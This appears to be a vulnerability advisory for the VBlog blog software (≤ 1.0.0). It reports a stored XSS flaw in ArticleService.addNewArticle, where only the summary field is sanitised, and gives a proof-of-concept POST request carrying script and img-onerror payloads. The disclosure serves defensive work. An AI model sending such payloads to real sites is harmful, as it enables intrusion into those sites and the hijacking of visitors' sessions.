BUG_Author: s0l42

Affected Version: VBlog ≤ 1.0.0

Vendor: VBlog GitHub Repository

Software: VBlog

Vulnerability Files:

• blogserver/src/main/java/org/sang/service/ArticleService.java

Description:

Stored XSS via Post Article:

• In the file blogserver/src/main/java/org/sang/service/ArticleService.java, the function addNewArticle just apply stripHtml to summary , however, the Article class has 3 fields filled by user input.
• Thus, when user inputs content including javascript, the script can be executed.

Proof of Concept:

POST /article/ HTTP/1.1
Host: xxxx
Content-Length: 360
User-Agent: xxxx
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
Origin: xxx
Referer: xxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: xxxx
Connection: keep-alive

id=121&title=1&mdContent=%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%0A%0A&htmlContent=%3cscript%3ealert(1)%3b%3c%2fscript%3e%0a%3cp%3e%3cimg%20src%3d%22%22%20onerror%3d%22alert(1)%22%20alt%3d%221.jpg%22%20%2f%3e%3c%2fp%3e%0a&cid=58&state=1&dynamicTags=&

If success, when user visit the article, the page pop-up an alert.